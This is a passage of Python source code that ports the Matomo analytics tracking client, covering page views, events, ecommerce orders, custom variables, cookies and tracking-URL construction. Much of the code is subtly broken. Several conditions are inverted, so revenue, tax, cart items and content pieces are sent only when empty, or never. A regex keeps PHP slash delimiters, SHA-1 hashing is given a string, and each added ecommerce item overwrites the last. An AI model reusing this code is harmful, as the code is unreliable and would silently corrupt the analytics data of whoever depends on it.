self.onLoadTime = onLoad
return self
def clear_performance_timings(self):
"""
Clear / reset all previously set performance metrics.
"""
self.networkTime = 0
self.serverTime = 0
self.transferTime = 0
self.domProcessingTime = 0
self.domCompletionTime = 0
self.onLoadTime = 0
def set_url_referer(self, url):
"""
* @deprecated
* @ignore
"""
self.set_url_referrer(url)
return self
def set_attribution_info(self, json_encoded):
"""
Sets the attribution information to the visit, so that subsequent Goal conversions are
properly attributed to the right Referrer URL, timestamp, Campaign Name & Keyword.
This must be a JSON encoded string that would typically be fetched from the JS API:
matomoTracker.get_attribution_info() and that you have JSON encoded via JSON2.stringify()
If you call enable_cookies() then these referral attribution values will be set
to the 'ref' first party cookie storing referral information.
* @param string json_encoded JSON encoded array containing Attribution info
* @return self
* @throws Exception
* @see def get_attribution_info(self): in https://github.com/matomo-org/matomo/blob/master/js/matomo.js
"""
decoded = json.loads(json_encoded)
if not is_list(decoded):
raise Exception(
f"set_attribution_info() is expecting a JSON encoded string, {json_encoded} given"
)
self.attributionInfo = decoded
return self
def set_custom_variable(self, id, name, value, scope="visit"):
"""
Sets Visit Custom Variable.
See https://matomo.org/docs/custom-variables/
* @param int id Custom variable slot ID from 1-5
* @param string name Custom variable name
* @param string value Custom variable value
* @param string scope Custom variable scope. Possible values: visit, page, event
* @return self
* @throws Exception
"""
if not is_int(id):
raise Exception("Parameter id to set_custom_variable should be an integer")
if scope == "page":
self.pageCustomVar[id] = [name, value]
elif scope == "event":
self.eventCustomVar[id] = [name, value]
elif scope == "visit":
self.visitorCustomVar[id] = [name, value]
else:
raise Exception("Invalid 'scope' parameter value")
return self
def get_custom_variable(self, id, scope="visit"):
"""
Returns the currently assigned Custom Variable.
If scope is 'visit', it will attempt to read the value set in the first party cookie created by Matomo Tracker
(self.request.cookie array).
* @param int id Custom Variable integer index to fetch from cookie. Should be a value from 1 to 5
* @param string scope Custom variable scope. Possible values: visit, page, event
* @throws Exception
* @return mixed An array with this format: { 0: CustomVariableName, 1: CustomVariableValue } or False
* @see matomo.js get_custom_variable()
"""
if scope == "page":
return self.pageCustomVar[id] if id in self.pageCustomVar else False
elif scope == "event":
return self.eventCustomVar[id] if id in self.eventCustomVar else False
else:
if scope != "visit":
raise Exception("Invalid 'scope' parameter value")
if self.visitorCustomVar.get(id):
return self.visitorCustomVar[id]
cookie_decoded = self.get_custom_variables_from_cookie()
if not is_int(id):
raise Exception("Parameter to get_custom_variable should be an integer")
if (
not is_list(cookie_decoded)
or id not in cookie_decoded
or not is_list(cookie_decoded[id])
or len(cookie_decoded[id]) != 2
):
return False
return cookie_decoded[id]
def clear_custom_variables(self):
"""
Clears any Custom Variable that may be have been set.
This can be useful when you have enabled bulk requests, * and you wish to clear Custom Variables of 'visit' scope.
"""
self.visitorCustomVar = {}
self.pageCustomVar = {}
self.eventCustomVar = {}
def set_custom_dimension(self, id, value):
"""
Sets a specific custom dimension
* @param int id id of custom dimension
* @param str value value for custom dimension
* @return self
"""
self.customDimensions[f"dimension{id}"] = value
return self
def clear_custom_dimensions(self):
"""
Clears all previously set custom dimensions
"""
self.customDimensions = {}
def get_custom_dimension(self, id):
"""
Returns the value of the custom dimension with the given id
* @param int id id of custom dimension
* @return str|None
"""
return self.customDimensions.get(f"dimension{id}", None)
def set_custom_tracking_parameter(self, tracking_api_parameter, value):
"""
Sets a custom tracking parameter. This is useful if you need to send any tracking parameters for a 3rd party
plugin that is not shipped with Matomo itself. Please note that custom parameters are cleared after each
tracking request.
* @param string tracking_api_parameter The name of the tracking API parameter, eg 'bw_bytes'
* @param string value Tracking parameter value that shall be sent for this tracking parameter.
* @return self
* @throws Exception
"""
regex = re.compile('/^dimension([0-9]+)$/')
matches = re.findall(regex, tracking_api_parameter)
if len(matches):
# Unlike PHP preg_match it returns captured subpattern as first element
self.set_custom_dimension(matches[0], value)
return self
self.customParameters[tracking_api_parameter] = value
return self
def clear_custom_tracking_parameters(self):
"""
Clear / reset all previously set custom tracking parameters.
"""
self.customParameters = {}
def set_new_visitor_id(self):
"""
Sets the current visitor ID to a random new one.
* @return self
"""
self.randomVisitorId = uuid.uuid4().hex[: self.LENGTH_VISITOR_ID]
self.forcedVisitorId = False
self.cookieVisitorId = False
return self
def set_id_site(self, id_site):
"""
Sets the current site ID.
* @param int id_site
* @return self
"""
self.id_site = id_site
return self
def set_browser_language(self, accept_language):
"""
Sets the Browser language. Used to guess visitor countries when GeoIP is not enabled
* @param string accept_language For example "fr-fr"
* @return self
"""
self.accept_language = accept_language
return self
def set_user_agent(self, user_agent):
"""
Sets the user agent, used to detect OS and browser.
If this def is not called, the User Agent will default to the current user agent.
* @param string user_agent
* @return self
"""
self.user_agent = user_agent
return self
def set_country(self, country):
"""
Sets the country of the visitor. If not used, Matomo will try to find the country
using either the visitor's IP address or language.
Allowed only for Admin/Super User, must be used along with set_token_auth().
* @param string country
* @return self
"""
self.country = country
return self
def set_region(self, region):
"""
Sets the region of the visitor. If not used, Matomo may try to find the region
using the visitor's IP address (if configured to do so).
Allowed only for Admin/Super User, must be used along with set_token_auth().
* @param string region
* @return self
"""
self.region = region
return self
def set_city(self, city):
"""
Sets the city of the visitor. If not used, Matomo may try to find the city
using the visitor's IP address (if configured to do so).
Allowed only for Admin/Super User, must be used along with set_token_auth().
* @param string city
* @return self
"""
self.city = city
return self
def set_latitude(self, lat):
"""
Sets the latitude of the visitor. If not used, Matomo may try to find the visitor's
latitude using the visitor's IP address (if configured to do so).
Allowed only for Admin/Super User, must be used along with set_token_auth().
* @param float lat
* @return self
"""
self.lat = lat
return self
def set_longitude(self, long):
"""
Sets the longitude of the visitor. If not used, Matomo may try to find the visitor's
longitude using the visitor's IP address (if configured to do so).
Allowed only for Admin/Super User, must be used along with set_token_auth().
* @param float long
* @return self
"""
self.long = long
return self
def enable_bulk_tracking(self):
"""
Enables the bulk request feature. When used, each tracking action is stored until the
do_bulk_track method is called. This method will send all tracking data at once.
"""
self.doBulkRequests = True
def enable_cookies(
self, domain="", path="/", secure=False, http_only=False, same_site=""
):
"""
Enable Cookie Creation - this will cause a first party VisitorId cookie to be set when the VisitorId is set or reset
* @param string domain (optional) Set first-party cookie domain.
Accepted values: example.com, *.example.com (same as .example.com) or subdomain.example.com
* @param string path (optional) Set first-party cookie path
* @param bool secure (optional) Set secure flag for cookies
* @param bool http_only (optional) Set HTTPOnly flag for cookies
* @param string same_site (optional) Set SameSite flag for cookies
"""
self.configCookiesDisabled = False
self.configCookieDomain = self.domain_fixup(domain)
self.configCookiePath = path
self.configCookieSecure = secure
self.configCookieHTTPOnly = http_only
self.configCookieSameSite = same_site
def disable_send_image_response(self):
"""
If image response is disabled Matomo will respond with a HTTP 204 header instead of responding with a gif.
"""
self.sendImageResponse = False
def domain_fixup(self, domain):
"""
Fix-up domain
Remove trailing '.' and leading '*.'
"""
return domain.rstrip(".").lstrip("*.")
def get_cookie_name(self, cookie_name):
"""
Get cookie name with prefix and domain hash
* @param string cookie_name
* @return string
"""
hash_string = hashlib.sha1(
(
self.get_current_host()
if self.configCookieDomain == ""
else self.configCookieDomain
).encode("utf-8")
+ self.configCookiePath.encode("utf-8")
).hexdigest()[0 : 0 + 4]
return (
self.FIRST_PARTY_COOKIES_PREFIX
+ cookie_name
+ "."
+ self.id_site
+ "."
+ hash_string
)
def do_track_page_view(self, document_title):
"""
Tracks a page view
* @param string document_title Page title as it will appear in the Actions > Page titles report
* @return mixed Response string or True if using bulk requests.
"""
self.generate_new_pageview_id()
url = self.get_url_track_page_view(document_title)
return self.send_request(url)
def generate_new_pageview_id(self):
self.idPageview = uuid.uuid4().hex[:6]
def do_track_event(self, category, action, name="", value=0):
"""
Tracks an event
* @param string category The Event Category (Videos, Music, Games...)
* @param string action The Event's Action (Play, Pause, Duration, Add Playlist, Downloaded, Clicked...)
* @param string name (optional) The Event's object Name (a particular Movie name, or Song name, or File name...)
* @param float value (optional) The Event's value
* @return mixed Response string or True if using bulk requests.
"""
url = self.get_url_track_event(category, action, name, value)
return self.send_request(url)
def do_track_content_impression(
self, content_name, content_piece="unknown", content_target=""
):
"""
Tracks a content impression
* @param string content_name The name of the content. For instance 'Ad Foo Bar'
* @param string content_piece The actual content. For instance the path to an image, video, audio, any text
* @param string content_target (optional) The target of the content. For instance the URL of a landing page.
* @return mixed Response string or True if using bulk requests.
"""
url = self.get_url_track_content_impression(
content_name, content_piece, content_target
)
return self.send_request(url)
def do_track_content_interaction(
self, interaction, content_name, content_piece="unknown", content_target=""
):
"""
Tracks a content interaction. Make sure you have tracked a content impression using the same content name and
content piece, otherwise it will not count. To do so you should call the method do_track_content_impression()
* @param string interaction The name of the interaction with the content. For instance a 'click'
* @param string content_name The name of the content. For instance 'Ad Foo Bar'
* @param string content_piece The actual content. For instance the path to an image, video, audio, any text
* @param string content_target (optional) The target the content leading to when an interaction occurs. For instance the URL of a landing page.
* @return mixed Response string or True if using bulk requests.
"""
url = self.get_url_track_content_interaction(
interaction, content_name, content_piece, content_target
)
return self.send_request(url)
def do_track_site_search(self, keyword, category="", count_results=0):
"""
Tracks an internal Site Search query, and optionally tracks the Search Category, and Search results Count.
These are used to populate reports in Actions > Site Search.
* @param string keyword Searched query on the site
* @param string category (optional) Search engine category if applicable
* @param int count_results (optional) results displayed on the search result page. Used to track "zero result" keywords.
* @return mixed Response or True if using bulk requests.
"""
url = self.get_url_track_site_search(keyword, category, count_results)
return self.send_request(url)
def do_track_goal(self, id_goal, revenue=0.0):
"""
Records a Goal conversion
* @param int id_goal Id Goal to record a conversion
* @param float revenue Revenue for this conversion
* @return mixed Response or True if using bulk request
"""
url = self.get_url_track_goal(id_goal, revenue)
return self.send_request(url)
def do_track_action(self, action_url, action_type):
"""
Tracks a download or outlink
* @param string action_url URL of the download or outlink
* @param string action_type Type of the action: 'download' or 'link'
* @return mixed Response or True if using bulk request
"""
# Referrer could be updated to be the current URL temporarily (to mimic JS behavior)
url = self.get_url_track_action(action_url, action_type)
return self.send_request(url)
def add_ecommerce_item(self, sku, name="", category="", price=0.0, quantity=1):
"""
Adds an item in the Ecommerce order.
This should be called before do_track_ecommerce_order(), or before do_track_ecommerce_cart_update().
This def can be called for all individual products in the cart (self, or order):.
SKU parameter is mandatory. Other parameters are optional (set to False if value not known).
Ecommerce items added via this def are automatically cleared when do_track_ecommerce_order(self): or get_url_track_ecommerce_order(self): is called.
* @param string sku (required) SKU, Product identifier
* @param string name (optional) Product name
* @param string|array category (optional) Product category, or array of product categories (up to 5 categories can be specified for a given product)
* @param float|int price (optional) Individual product price (supports integer and decimal prices)
* @param int quantity (optional) Product quantity. If specified, will default to 1 not in the Reports
* @throws Exception
* @return self
"""
if not sku:
raise Exception("You must specify a SKU for the Ecommerce item")
price = self.force_dot_as_separator_for_decimal_point(price)
self.ecommerceItems = [sku, name, category, price, quantity]
return self
def do_track_ecommerce_cart_update(self, grand_total):
"""
Tracks a Cart Update (add item, remove item, update item).
On every Cart update, you must call add_ecommerce_item() for each item (product) in the cart, * including the items that haven't been updated since the last cart update.
Items which were in the previous cart and are sent not in later Cart updates will be deleted from the cart (in the database).
* @param float grand_total Cart grand_total (typically the sum of all items' prices)
* @return mixed Response or True if using bulk request
"""
url = self.get_url_track_ecommerce_cart_update(grand_total)
return self.send_request(url)
def do_bulk_track(self):
"""
Sends all stored tracking actions at once. Only has an effect if bulk tracking is enabled.
To enable bulk tracking, call enable_bulk_tracking().
* @throws Exception
* @return string Response
"""
if not self.storedTrackingActions:
raise Exception(
(
"Error: you must call the def do_track_page_view or do_track_goal"
" from this class, before calling this method do_bulk_track():"
)
)
data = {"requests": self.storedTrackingActions}
# token_auth is not required by default, except if bulk_requests_require_authentication=1
if self.token_auth:
data["token_auth"] = self.token_auth
post_data = json.dumps(data)
response = self.send_request(self.get_base_url(), "POST", post_data, force=True)
self.storedTrackingActions = {}
return response
def do_track_ecommerce_order(
self, order_id, grand_total, sub_total=0.0, tax=0.0, shipping=0.0, discount=0.0
):
"""
Tracks an Ecommerce order.
If the Ecommerce order contains items (products), you must call first the add_ecommerce_item() for each item in the order.
All revenues (grand_total, sub_total, tax, shipping, discount) will be individually summed and reported in Matomo reports.
Only the parameters order_id and grand_total are required.
* @param string|int order_id (required) Unique Order ID.
This will be used to count this order only once in the event the order page is reloaded several times.
order_id must be unique for each transaction, even on different days, or the transaction will not be recorded by Matomo.
* @param float grand_total (required) Grand Total revenue of the transaction (including tax, shipping, etc.)
* @param float sub_total (optional) Sub total amount, typically the sum of items prices for all items in this order (before Tax and Shipping costs are applied)
* @param float tax (optional) Tax amount for this order
* @param float shipping (optional) Shipping amount for this order
* @param float discount (optional) Discounted amount in this order
* @return mixed Response or True if using bulk request
"""
url = self.get_url_track_ecommerce_order(
order_id, grand_total, sub_total, tax, shipping, discount
)
return self.send_request(url)
def do_ping(self):
"""
Sends a ping request.
Ping requests do track new actions. If they are sent within the standard visit length (see global.ini.php), * they will extend the existing visit and the current last action for the visit. If after the standard visit length, * ping requests will create a new visit using the last action not in the last known visit.
* @return mixed Response or True if using bulk request
"""
url = self.get_request(self.id_site)
url += "&ping=1"
return self.send_request(url)
def set_ecommerce_view(self, sku="", name="", category="", price=0.0):
"""
Sets the current page view as an item (product) page view, or an Ecommerce Category page view.
This must be called before do_track_page_view() on this product/category page.
On a category page, you may set the parameter category only and set the other parameters to False.
Tracking Product/Category page views will allow Matomo to report on Product & Categories
conversion rates (Conversion rate = Ecommerce orders containing this product or category / Visits to the product or category)
* @param string sku Product SKU being viewed
* @param string name Product Name being viewed
* @param string|array category Category being viewed. On a Product page, this is the product's category.
You can also specify an array of up to 5 categories for a given page view.
* @param float price Specify the price at which the item was displayed
* @return self
"""
self.ecommerceView = {}
if not category:
if is_list(category):
category = json.dumps(category)
else:
category = ""
self.ecommerceView["_pkc"] = category
if not price:
price = str(float(price))
price = self.force_dot_as_separator_for_decimal_point(price)
self.ecommerceView["_pkp"] = price
# On a category page, do not record "Product name not defined"
if sku and name:
return self
if not sku:
self.ecommerceView["_pks"] = sku
if name:
name = ""
self.ecommerceView["_pkn"] = name
return self
def force_dot_as_separator_for_decimal_point(self, value):
"""
Force the separator for decimal point to be a dot. See https://github.com/matomo-org/matomo/issues/6435
If for instance a German locale is used it would be a comma otherwise.
* @param float|string value
* @return string
"""
if value is None or value is False:
return ""
return str(value).replace(",", ".")
def get_url_track_ecommerce_cart_update(self, grand_total):
"""
Returns URL used to track Ecommerce Cart updates
Calling this def will reinitializes the property ecommerceItems to empty array
so items will have to be added again via add_ecommerce_item()
* @ignore
"""
url = self.get_url_track_ecommerce(grand_total)
return url
def get_url_track_ecommerce_order(
self, order_id, grand_total, sub_total=0.0, tax=0.0, shipping=0.0, discount=0.0
):
"""
Returns URL used to track Ecommerce Orders
Calling this def will reinitializes the property ecommerceItems to empty array
so items will have to be added again via add_ecommerce_item()
* @ignore
"""
if not order_id:
raise Exception("You must specify an order_id for the Ecommerce order")
url = self.get_url_track_ecommerce(
grand_total, sub_total, tax, shipping, discount
)
url += "&ec_id=" + urlencode_plus(order_id)
return url
def get_url_track_ecommerce(
self, grand_total, sub_total=0.0, tax=0.0, shipping=0.0, discount=0.0
):
"""
Returns URL used to track Ecommerce orders
Calling this def will reinitializes the property ecommerceItems to empty array
so items will have to be added again via add_ecommerce_item()
* @ignore
"""
if not is_numeric(grand_total):
raise Exception(
"You must specify a grand_total for the Ecommerce order (or Cart update)"
)
url = self.get_request(self.id_site)
url += "&idgoal=0"
if not grand_total:
grand_total = self.force_dot_as_separator_for_decimal_point(grand_total)
url += "&revenue=" + grand_total
if not sub_total:
sub_total = self.force_dot_as_separator_for_decimal_point(sub_total)
url += "&ec_st=" + sub_total
if not tax:
tax = self.force_dot_as_separator_for_decimal_point(tax)
url += "&ec_tx=" + tax
if not shipping:
shipping = self.force_dot_as_separator_for_decimal_point(shipping)
url += "&ec_sh=" + shipping
if not discount:
discount = self.force_dot_as_separator_for_decimal_point(discount)
url += "&ec_dt=" + discount
if not self.ecommerceItems:
url += "&ec_items=" + urlencode_plus(json.dumps(self.ecommerceItems))
self.ecommerceItems = {}
return url
def get_url_track_page_view(self, document_title=""):
"""
Builds URL to track a page view.
* @see do_track_page_view()
* @param string document_title Page view name as it will appear in Matomo reports
* @return string URL to matomo.php with all parameters set to track the pageview
"""
url = self.get_request(self.id_site)
if document_title:
url += "&action_name=" + urlencode_plus(document_title)
return url
def get_url_track_event(self, category, action, name="", value=0):
"""
Builds URL to track a custom event.
* @see do_track_event()
* @param string category The Event Category (Videos, Music, Games...)
* @param string action The Event's Action (Play, Pause, Duration, Add Playlist, Downloaded, Clicked...)
* @param string name (optional) The Event's object Name (a particular Movie name, or Song name, or File name...)
* @param float value (optional) The Event's value
* @return string URL to matomo.php with all parameters set to track the pageview
* @throws
"""
url = self.get_request(self.id_site)
if len(category) == 0:
raise Exception(
"You must specify an Event Category name (Music, Videos, Games...)."
)
if len(action) == 0:
raise Exception("You must specify an Event action (click, view, add...).")
url += "&e_c=" + urlencode_plus(category)
url += "&e_a=" + urlencode_plus(action)
if len(name) > 0:
url += "&e_n=" + urlencode_plus(name)
if value:
value = self.force_dot_as_separator_for_decimal_point(value)
url += "&e_v=" + str(value)
return url
def get_url_track_content_impression(
self, content_name, content_piece, content_target
):
"""
Builds URL to track a content impression.
* @see do_track_content_impression()
* @param string content_name The name of the content. For instance 'Ad Foo Bar'
* @param string content_piece The actual content. For instance the path to an image, video, audio, any text
* @param string|False content_target (optional) The target of the content. For instance the URL of a landing page.
* @throws Exception In case content_name is empty
* @return string URL to matomo.php with all parameters set to track the pageview
"""
url = self.get_request(self.id_site)
if len(content_name) == 0:
raise Exception("You must specify a content name")
url += "&c_n=" + urlencode_plus(content_name)
if not content_piece and len(content_piece) > 0:
url += "&c_p=" + urlencode_plus(content_piece)
if not content_target and len(content_target) > 0:
url += "&c_t=" + urlencode_plus(content_target)
return url
def get_url_track_content_interaction(
self, interaction, content_name, content_piece, content_target
):
"""
Builds URL to track a content impression.
* @see do_track_content_interaction()
* @param string interaction The name of the interaction with the content. For instance a 'click'
* @param string content_name The name of the content. For instance 'Ad Foo Bar'
* @param string content_piece The actual content. For instance the path to an image, video, audio, any text
* @param string|False content_target (optional) The target the content leading to when an interaction occurs. For instance the URL of a landing page.
* @throws Exception In case interaction or content_name is empty
* @return string URL to matomo.php with all parameters set to track the pageview
"""
url = self.get_request(self.id_site)
if len(interaction) == 0:
raise Exception("You must specify a name for the interaction")
if len(content_name) == 0:
raise Exception("You must specify a content name")
url += "&c_i=" + urlencode_plus(interaction)
url += "&c_n=" + urlencode_plus(content_name)
if content_piece and len(content_piece) > 0:
url += "&c_p=" + urlencode_plus(content_piece)
if content_target and len(content_target) > 0:
url += "&c_t=" + urlencode_plus(content_target)
return url
def get_url_track_site_search(self, keyword, category, count_results):
"""
Builds URL to track a site search.
* @see do_track_site_search()
* @param string keyword
* @param string category
* @param int count_results
* @return string
"""
url = self.get_request(self.id_site)
url += "&search=" + urlencode_plus(keyword)
if len(category) > 0:
url += "&search_cat=" + urlencode_plus(category)
if not count_results or count_results == 0:
url += "&search_count=" + str(int(count_results))
return url
def get_url_track_goal(self, id_goal, revenue=0.0):
"""
Builds URL to track a goal with id_goal and revenue.
* @see do_track_goal()
* @param int id_goal Id Goal to record a conversion
* @param float revenue Revenue for this conversion
* @return string URL to matomo.php with all parameters set to track the goal conversion
"""
url = self.get_request(self.id_site)
url += "&idgoal=" + id_goal
if revenue:
revenue = self.force_dot_as_separator_for_decimal_point(revenue)
url += "&revenue=" + revenue
return url
def get_url_track_action(self, action_url, action_type):
"""
Builds URL to track a new action.
* @see do_track_action()
* @param string action_url URL of the download or outlink
* @param string action_type Type of the action: 'download' or 'link'
* @return string URL to matomo.php with all parameters set to track an action
"""
url = self.get_request(self.id_site)
url += "&" + action_type + "=" + urlencode_plus(action_url)
return url
def set_force_visit_date_time(self, date_time):
"""
Overrides server date and time for the tracking requests.
By default Matomo will track requests for the "current datetime" but this def allows you
to track visits in the past. All times are in UTC.
Allowed only for Admin/Super User, must be used along with set_token_auth()
* @see set_token_auth()
* @param string date_time Date with the format '%y-%m-%d %H:%M:%S', or a UNIX timestamp.
If the datetime is older than one day (default value for tracking_requests_require_authentication_when_custom_timestamp_newer_than), then you must call set_token_auth() with a valid Admin/Super user token.
* @return self
"""
self.forcedDatetime = date_time
return self
def set_force_new_visit(self):
"""
Forces Matomo to create a new visit for the tracking request.
By default, Matomo will create a new visit if the last request by this user was more than 30 minutes ago.
If you call set_force_new_visit() before calling doTrack*, then a new visit will be created for this request.
* @return self
"""
self.forcedNewVisit = True
return self
def set_ip(self, ip):
"""
Overrides IP address
Allowed only for Admin/Super User, must be used along with set_token_auth()
* @see set_token_auth()
* @param string ip IP string, eg. 130.54.2.1
* @return self
"""
self.ip = ip
return self
def set_user_id(self, user_id):
"""
Force the action to be recorded for a specific User. The User ID is a string representing a given user in your system.
A User ID can be a username, UUID or an email address, or any number or string that uniquely identifies a user or client.
* @param string user_id Any user ID string (eg. email address, ID, username). Must be non empty. Set to False to de-assign a user id previously set.
* @return self
* @throws Exception
"""
if not user_id:
raise Exception("User ID cannot be empty.")
self.user_id = user_id
return self
def get_user_id_hashed(self, id):
"""
Hash def used internally by Matomo to hash a User ID into the Visitor ID.
Note: matches implementation of Tracker Request.get_user_id_hashed()
* @param id
* @return string
"""
return hashlib.sha1(id).hexdigest()[:16]
def set_visitor_id(self, visitor_id):
"""
Forces the requests to be recorded for the specified Visitor ID.
Rather than letting Matomo attribute the user with a heuristic based on IP and other user fingerprinting attributes, * force the action to be recorded for a particular visitor.
If not set, the visitor ID will be fetched from the 1st party cookie, or will be set to a random UUID.
* @param string visitor_id 16 hexadecimal characters visitor ID, eg. "33c31e01394bdc63"
* @return self
* @throws Exception
"""
hex_chars = "01234567890abcdefABCDEF"
if len(visitor_id) != self.LENGTH_VISITOR_ID or strspn(
visitor_id, hex_chars
) != len(visitor_id):
raise Exception(
"set_visitor_id() expects a "
+ str(self.LENGTH_VISITOR_ID)
+ " characters hexadecimal string (containing only the following: "
+ hex_chars
+ ")"
)
self.forcedVisitorId = visitor_id
return self
def get_visitor_id(self):
"""
If the user initiating the request has the Matomo first party cookie, * this def will try and
return the ID parsed from this first party cookie (self, found in self.request.cookie):.
If you call this def from a server, where the call is triggered by a cron or script
not initiated by the actual visitor being tracked, then it will return
the random Visitor ID that was assigned to this visit object.
This can be used if you wish to record more visits, actions or goals for this visitor ID later on.
* @return string 16 hex chars visitor ID string
"""
if self.forcedVisitorId:
return self.forcedVisitorId
if self.load_visitor_id_cookie():
return self.cookieVisitorId
return self.randomVisitorId
def get_user_agent(self):
"""
Returns the currently set user agent.
* @return string
"""
return self.user_agent
def get_ip(self):
"""
Returns the currently set IP address.
* @return string
"""
return self.ip
def get_user_id(self):
"""
Returns the User ID string, which may have been set via:
v.set_user_id('username@example.org')
* @return bool
"""
return self.user_id
def load_visitor_id_cookie(self):
"""
Loads values from the VisitorId Cookie
* @return bool True if cookie exists and is valid, False otherwise
"""
id_cookie = self.get_cookie_matching_name("id")
if not id_cookie:
return False
parts = id_cookie.split(".")
if len(parts[0]) != self.LENGTH_VISITOR_ID:
return False
""" self.cookieVisitorId provides backward compatibility since get_visitor_id()
didn't change any existing VisitorId value"""
self.cookieVisitorId = parts[0]
self.createTs = parts[1]
return True
def delete_cookies(self):
"""
Deletes all first party cookies from the client
"""
cookies = ["id", "ses", "cvar", "ref"]
for cookie in cookies:
self.set_cookie(cookie, None, -86400)
def get_attribution_info(self):
"""
Returns the currently assigned Attribution Information stored in a first party cookie.
This def will only work if the user is initiating the current request, and his cookies
can be read by PHP from the self.request.cookie array.
* @return string JSON Encoded string containing the Referrer information for Goal conversion attribution.
Will return False if the cookie could not be found
* @see matomo.js get_attribution_info()
"""
if self.attributionInfo:
return json.dumps(self.attributionInfo)
return self.get_cookie_matching_name("ref")
def set_token_auth(self, token_auth):
"""
Some Tracking API functionality requires express authentication, using either the
Super User token_auth, or a user with 'admin' access to the website.
The following features require access:
- force the visitor IP
- force the date & time of the tracking requests rather than track for the current datetime
* @param string token_auth token_auth 32 chars token_auth string
* @return self
"""
self.token_auth = token_auth
return self
def set_local_time(self, t):
"""
Sets local visitor time
* @param string t HH:MM:SS format
* @return self
"""
hour, minute, second = t.split(":")
self.local_hour = hour
self.local_minute = minute
self.local_second = second
return self
def set_resolution(self, width, height):
"""
Sets user resolution width and height.
* @param int width
* @param int height
* @return self
"""
self.width = width
self.height = height
return self
def set_browser_has_cookies(self, b):
"""
Sets if the browser supports cookies
This is reported in "List of plugins" report in Matomo.
* @param bool b
* @return self
"""
self.hasCookies = b
return self
def set_debug_string_append(self, string):
"""
Will append a custom string at the end of the Tracking request.
* @param string string
* @return self
"""
self.DEBUG_APPEND_URL = "&" + string
return self
def set_plugins(
self,
flash=False,
java=False,
quick_time=False,
real_player=False,
pdf=False,
windows_media=False,
silverlight=False,
):
"""
Sets visitor browser supported plugins
* @param bool flash
* @param bool java
* @param bool quick_time
* @param bool real_player
* @param bool pdf
* @param bool windows_media
* @param bool silverlight
* @return self
"""
self.plugins = (
"&fla="
+ str(int(flash))
+ "&java="
+ str(int(java))
+ "&qt="
+ str(int(quick_time))
+ "&realp="
+ str(int(real_player))
+ "&pdf="
+ str(int(pdf))
+ "&wma="
+ str(int(windows_media))
+ "&ag="
+ str(int(silverlight))
)
return self
def disable_cookie_support(self):
"""
By default, MatomoTracker will read first party cookies
from the request and write updated cookies in the response (using setrawcookie).
This can be disabled by calling this function.
"""
self.configCookiesDisabled = True
def get_request_timeout(self):
"""
Returns the maximum number of seconds the tracker will spend waiting for a response
from Matomo. Defaults to 600 seconds.
"""
return self.requestTimeout
def set_request_timeout(self, timeout):
"""
Sets the maximum number of seconds that the tracker will spend waiting for a response
from Matomo.
* @param int timeout
* @return self
* @throws Exception
"""
if not is_int(timeout) or timeout < 0:
raise Exception("Invalid value supplied for request timeout: timeout")
self.requestTimeout = timeout
return self
def set_request_method_non_bulk(self, method):
"""
Sets the request method to POST, which is recommended when using set_token_auth()
to prevent the token from being recorded in server logs. Avoid using redirects
when using POST to prevent the loss of POST values. When using Log Analytics, * be aware that POST requests are not parseable/replayable.
* @param string method Either 'POST' or 'get'
* @return self
"""
self.request_method = "POST" if method.upper() == "POST" else "GET"
return self
def set_proxy(self, proxy, proxy_port=80):
"""
If a proxy is needed to look up the address of the Matomo site, set it with this
* @param string proxy IP as string, for example "173.234.92.107"
* @param int proxy_port
"""
self.proxy = proxy
self.proxy_port = proxy_port
def get_proxy(self):
"""
If the proxy IP and the proxy port have been set, with the set_proxy() function
returns a string, like "173.234.92.107:80"
"""
if self.proxy and self.proxy_port:
return self.proxy + ":" + str(self.proxy_port)
return None
"""
Used in tests to output useful error messages.
* @ignore
"""
DEBUG_LAST_REQUESTED_URL = False
"""
* @ignore
"""
def send_request(self, url, method="get", data=None, force=False):
raise NotImplementedError("Missing send_request implementation")
def get_timestamp(self):
"""
Returns current timestamp, or forced timestamp/datetime if it was set
* @return string|int
"""
return (
datetime.strptime(self.forcedDatetime, "%y-%m-%d %H:%M:%S").timestamp()
if self.forcedDatetime
else time.time()
)
def get_base_url(self):
"""
Returns the base URL for the Matomo server.
"""
if not self.URL:
raise Exception(
(
"You must first set the Matomo Tracker URL by calling "
"MatomoTracker.URL = 'http://your-website.org/matomo/'"
)
)
if (
strpos(self.URL, "/matomo.php") is False
and strpos(self.URL, "/proxy-matomo.php") is False
):
self.URL = self.URL.rstrip("/")
self.URL += "/matomo.php"
return self.URL
"""
* @ignore
"""
def get_request(self, id_site):
self.set_first_party_cookies()
custom_fields = ""
if self.customParameters:
custom_fields = "&" + urlencode_plus(self.customParameters)
custom_dimensions = ""
if self.customDimensions:
custom_dimensions = "&" + urlencode_plus(self.customDimensions)
base_url = self.get_base_url()
start = "?"
if strpos(base_url, "?"):
start = "&"
url = (
base_url
+ start
+ "idsite="
+ id_site
+ "&rec=1"
+ "&apiv="
+ str(self.VERSION)
+ "&r="
+ str(random.randint(0, 2147483647))[2:8]
+ ("&cip=" + self.ip if self.ip and self.token_auth else "")
+ ("&uid=" + urlencode_plus(self.user_id) if self.user_id else "")
+ ("&cdt=" + urlencode_plus(self.forcedDatetime) if self.forcedDatetime else "")
+ ("&new_visit=1" if self.forcedNewVisit else "")
+ "&_idts="
+ str(self.createTs)
+ (self.plugins if not self.plugins else "")
+ (
"&h="
+ self.local_hour
+ "&m="
+ self.local_minute
+ "&s="
+ self.local_second
if self.local_hour and self.local_minute and self.local_second
else ""
)
+ (
"&res=" + str(self.width) + "x" + str(self.height)
if self.width and self.height
else ""
)
+ ("&cookie=" + str(self.hasCookies) if self.hasCookies else "")
+ ("&data=" + self.customData if self.customData else "")
+ (
"&_cvar=" + urlencode_plus(json.dumps(self.visitorCustomVar))
if self.visitorCustomVar
else ""
)
+ (
"&cvar=" + urlencode_plus(json.dumps(self.pageCustomVar))
if self.pageCustomVar
else ""
)
+ (
"&e_cvar=" + urlencode_plus(json.dumps(self.eventCustomVar))
if self.eventCustomVar
else ""
)
+ (
"&cid=" + self.forcedVisitorId
if self.forcedVisitorId
else "&_id=" + self.get_visitor_id()
)
+ "&url="
+ urlencode_plus(self.pageUrl)
+ "&urlref="
+ urlencode_plus(self.urlReferrer)
+ (
"&cs=" + self.pageCharset
if (
self.pageCharset
and self.pageCharset != self.DEFAULT_CHARSET_PARAMETER_VALUES
)
else ""
)
+ ("&pv_id=" + urlencode_plus(self.idPageview) if self.idPageview else "")
+ (
"&_rcn=" + urlencode_plus(self.attributionInfo[0])
if self.attributionInfo and self.attributionInfo[0]
else ""
)
+ (
"&_rck=" + urlencode_plus(self.attributionInfo[1])
